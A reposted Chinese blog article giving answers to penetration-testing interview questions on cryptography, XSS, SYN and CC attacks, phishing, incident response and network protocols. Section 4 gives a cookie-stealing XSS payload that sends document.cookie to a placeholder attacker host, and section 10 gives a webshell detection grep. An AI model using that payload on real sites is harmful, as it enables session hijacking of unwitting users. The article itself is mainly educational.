当前位置: 首页 > news >正文

2025年渗透测试面试题总结-07(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

一、对称加密 vs 非对称加密

二、同源策略(Same-Origin Policy)

三、Cookie存储与访问

四、XSS盗取Cookie流程

五、XSS与登录凭证

六、XSS防御体系

七、SYN洪水攻击原理

八、网络钓鱼(Phishing)

九、CC攻击(Challenge Collapasar)

十、Web服务器入侵排查步骤

十一、DLL文件(动态链接库)

十二、HTTPS核心作用

十三、Web攻击防御速查

十四、协议分布层

十五、ARP协议工作原理

十六、RIP协议(路由信息协议)

十七、RARP(反向地址解析协议)

十八、OSPF协议(开放最短路径优先)

十九、TCP vs UDP核心区别

实用建议

一、对称加密和非对称加密二、什么是同源策略?三、cookie 存在哪里?可以打开吗?四、xss 如何盗取 cookie?五、xss 有 cookie 一定可以无用户名密码登录吗?六、xss 如何防御?七、SYN 攻击原理八、什么是网络钓鱼?九、什么是 CC 攻击?十、Web 服务器被入侵后,怎样进行排查?十一、dll 文件是什么意思,有什么用?十二、Https 的作用十三、防范常见的 Web 攻击十四、重要协议分布层十五、arp 协议的工作原理十六、rip 协议是什么?rip 的工作原理十七、什么是 RARP?工作原理十八、OSPF 协议?OSPF 的工作原理十九、TCP 与 UDP 区别总结

一、对称加密 vs 非对称加密

类型对称加密非对称加密
密钥机制单密钥(加密解密相同)公钥加密 + 私钥解密
速度快(适合大数据量)慢(CPU消耗高)
安全性依赖密钥保管私钥不泄露即安全
典型算法AES, DESRSA, ECC
应用场景HTTPS数据传输加密SSL握手、数字签名

二、同源策略(Same-Origin Policy)

  • 定义:浏览器限制不同源(协议+域名+端口相同)的脚本访问对方资源
  • 目的:防止恶意网站窃取用户数据(如Cookie)
  • 绕过机制
    • CORS(跨域资源共享):服务端设置Access-Control-Allow-Origin
    • JSONP:通过<script>标签加载跨域数据(仅限GET)

三、Cookie存储与访问

属性说明
存储位置浏览器本地(文件或数据库)
打开方式浏览器开发者工具 → Application → Cookies(可查看/编辑)
安全限制HttpOnly标记的Cookie禁止JS读取(防XSS盗取)
生命周期会话Cookie(关闭浏览器删除) / 持久Cookie(按Expires时间保留)

四、XSS盗取Cookie流程

mermaidsequenceDiagram attacker->>victim: 发送含恶意脚本的链接 victim->>server: 访问被攻击页面 server->>victim: 返回嵌入恶意脚本的HTML victim->>browser: 执行脚本(发送Cookie到攻击者服务器) attacker->>attacker_server: 接收Cookie数据 

关键代码document.cookie + new Image().src='http://hacker.com?cookie='+encodeURIComponent(document.cookie)


五、XSS与登录凭证

  • 有条件登录
    • ✅ 若Cookie含会话ID(如sessionid=xxx)且未设HttpOnly → 直接冒用身份
    • ❌ 若Cookie仅为用户偏好数据 → 无法登录
  • 限制
    • 会话ID需在有效期内
    • 目标网站未启用二次验证(如短信/OTP)

六、XSS防御体系

层级防御措施
输入过滤特殊字符转义(<&lt;)、白名单验证
输出编码根据上下文选择HTML/JS/URL编码(如<script>\u003cscript\u003e
CSP策略HTTP头设置Content-Security-Policy: script-src 'self'(禁止内联脚本)
Cookie安全标记HttpOnly + Secure(仅HTTPS传输)

七、SYN洪水攻击原理

  • 利用缺陷:TCP三次握手未完成时,服务端维护半连接队列(消耗资源)
  • 攻击步骤
    1. 伪造大量虚假IP发送SYN
    2. 服务端回复SYN-ACK并等待应答(队列占满)
    3. 正常用户无法建立连接
  • 防御方案
    • SYN Cookie技术(无状态验证)
    • 防火墙限制每秒SYN包数量

八、网络钓鱼(Phishing)

  • 手法:伪装可信机构(银行/支付平台),诱导用户提交敏感信息
  • 常见形式
    • 钓鱼邮件(含虚假登录链接)
    • 仿冒网站(域名如paypa1.com
    • 伪基站短信
  • 防御
    • 用户教育(识别域名、HTTPS锁标志)
    • 浏览器标记钓鱼网站(Safe Browsing API)

九、CC攻击(Challenge Collapasar)

  • 本质:针对应用层的DDoS攻击
  • 原理:模拟大量正常请求(如频繁刷新页面、API调用),耗尽服务器资源
  • 与DDoS区别
    CC攻击DDoS攻击
    应用层(HTTP)网络层(TCP/UDP洪水)
    消耗CPU/数据库消耗带宽/连接数
  • 防御
    • 人机验证(验证码)
    • 请求频率限制(IP/用户)

十、Web服务器入侵排查步骤

  1. 隔离服务器:断网防止横向渗透
  2. 备份日志
    • Web访问日志(Apache/Nginx)
    • 系统日志(/var/log/auth.log
  3. 查异常进程
    • netstat -tunlp(异常端口)
    • top(高CPU进程)
  4. 查后门文件
    • 查找近期修改文件:find / -mtime -2
    • 扫描Web目录:grep -r "eval(base64_decode" /var/www
  5. 漏洞修复:更新系统/应用补丁

十一、DLL文件(动态链接库)

  • 作用
    • 共享代码库(多个程序调用同一功能)
    • 模块化开发(如Windows系统kernel32.dll
  • 劫持风险:恶意DLL替换系统文件 → 程序加载时执行恶意代码
  • 防护
    • 签名验证(signtool verify
    • 设置DLL搜索路径白名单

十二、HTTPS核心作用

安全目标实现机制
数据保密性对称加密(如AES-256)
身份认证CA机构签发数字证书(验证服务器身份)
数据完整性MAC(消息认证码)或HMAC防篡改

十三、Web攻击防御速查

攻击类型防御方案
SQL注入参数化查询(PreparedStatement)、存储过程
CSRFAnti-CSRF Token、SameSite=Strict Cookie属性
文件上传限制扩展名(白名单)、重命名文件、存储到非Web目录
SSRF内网IP黑名单、请求目标域名白名单

十四、协议分布层

协议所属OSI层级典型应用
ARP数据链路层IP → MAC地址映射
RIP/OSPF网络层动态路由协议
TCP/UDP传输层端到端数据传输
HTTPS应用层安全HTTP通信

十五、ARP协议工作原理

  1. 查询:主机A广播ARP Request(目标IP → 问MAC)
  2. 响应:目标主机B单播ARP Reply(返回MAC)
  3. 缓存:主机A记录IP-MAC映射到ARP表(有效期分钟级)
  • 攻击风险:ARP欺骗(伪造MAC对应关系) → 中间人攻击
  • 防御:静态ARP绑定、网络设备ARP检测

十六、RIP协议(路由信息协议)

  • 类型:距离向量路由协议(基于跳数)
  • 工作原理
    1. 路由器每30秒广播路由表给邻居
    2. 跳数+1(最大15跳,16跳视为不可达)
    3. 路由收敛慢(需多次广播更新)
  • 适用场景:小型局域网(现多被OSPF替代)

十七、RARP(反向地址解析协议)

  • 作用:已知MAC地址 → 获取IP地址(无盘工作站场景)
  • 流程
    1. 客户端广播RARP Request(含自身MAC)
    2. RARP服务器响应RARP Reply(分配IP)
  • 替代协议:BOOTP、DHCP(功能更强大)

十八、OSPF协议(开放最短路径优先)

  • 类型:链路状态路由协议(基于Dijkstra算法)
  • 核心机制
    1. 洪泛法广播链路状态(LSA)
    2. 构建拓扑图 → 计算最短路径树
    3. 划分区域(Area 0为骨干)减少广播域
  • 优势:快速收敛、支持大规模网络

十九、TCP vs UDP核心区别

维度TCPUDP
连接方式面向连接(三次握手)无连接
可靠性有序、重传、流量控制尽力交付(可能丢包)
传输速度慢(头部20字节+握手延迟)快(头部8字节)
数据边界字节流(需处理粘包)数据报(保留边界)
应用场景文件传输、Web页面视频流、DNS查询、实时游戏

实用建议

  1. 协议分析:用Wireshark抓包观察TCP握手、ARP请求等流程
  2. 安全加固
    • Web服务器:定期更新补丁 + 最小化开放端口
    • 开发规范:禁用eval()、所有输入视为不可信
  3. 面试重点:深入理解HTTPS握手流程、XSS/CSRF防御方案、TCP可靠性机制

附:命令速查

  • 查看ARP缓存:arp -a
  • 检测开放端口:netstat -ano | findstr LISTENING
  • 验证证书链:openssl s_client -connect example.com:443 -showcerts
http://www.dtcms.com/a/321033.html

相关文章:

  • 登录注册前端详细实现 (Angular 15+)
  • Leetcode-.21合并两个有序链表
  • 如何板端编译OpenCV并搭建应用--基于瑞芯微米尔RK3576开发板
  • 视频质量检测中准确率↑32%:陌讯多模态评估方案实战解析
  • stm32u575手写数字识别教程
  • Coze Studio 概览(九)--插件管理
  • sqli-labs通关笔记-第37关POST宽字符注入(单引号闭合 手工注入+脚本注入 3种方法)
  • Zabbix监控MySQL性能实战指南
  • OpenAI 正式发布 GPT-5:架构与性能全解析
  • 【深度学习1】什么是神经网络
  • TDSQL GTS文件说明
  • SQL的多表连接查询(难点)
  • 【代码随想录day 15】 力扣 110.平衡二叉树
  • 总结运行CRMEB标准版(uniapp)微信小程序的问题
  • Spring Boot 优雅配置InfluxDB3客户端指南:@Configuration + @Bean + yml实战
  • 配置MyBatis SQL日志打印
  • 机器学习-----SVM(支持向量机)算法简介
  • PEV2(PostgreSQL Explain Visualizer 2)
  • 云平台运维工具 —— 阿里云原生工具
  • 2025年最新Java后端场景题+八股文合集(100w字面试题总结)
  • 「双训智伴」:重构人犬协同的智能训练生态系统
  • 基于 C++ 的湍流数值模拟理论报告
  • 无人机遥控器教练模式技术要点
  • Go 踩过的坑之协程参数不能过大
  • Chat GPT5功能
  • ESP32-menuconfig(3) -- Serial flasher config
  • 宁商平台税务升级之路:合规为纲,服务为本
  • 唯品会以图搜图(拍立淘)API接口调用指南详解
  • Vite React项目引入unocss 及 @unocss/preset-icons的使用
  • Mac安装python、conda环境教程